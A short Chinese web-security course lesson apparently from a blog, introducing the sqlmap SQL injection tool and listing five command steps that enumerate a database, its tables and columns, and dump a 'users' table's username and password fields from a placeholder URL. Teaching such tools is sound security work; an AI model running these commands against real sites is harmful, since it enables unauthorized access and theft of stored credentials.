风炫安全WEB安全学习第十七节课 使用Sqlmap自动化注入(一

风炫安全WEB安全学习第十七节课 使用Sqlmap自动化注入(一)

sqlmap的使用

sqlmap 是一个开源渗透测试工具，它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎，同时有众多功能，包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。

项目地址： https://github.com/sqlmapproject/sqlmap

• 第一步：-u "xxx" -u 参数指定地址然后进行注入
• 第二步 -u "xxx" --current-db 获取到当前数据库信息
• 第三步 -u "xxx" -D dbvuln --tables 获取数据库中的表名
• 第四步 -u "xxx" -D dbvuln -T users --columns 获取表名中的字段
• 第五步 -u "xxx" -D dbvuln -T users -C username,password --dump 获取表中的内容

参考：
https://blog.evalshell.com/2020/12/20/风炫安全web安全学习第十七节课-使用sqlmap自动化注入一/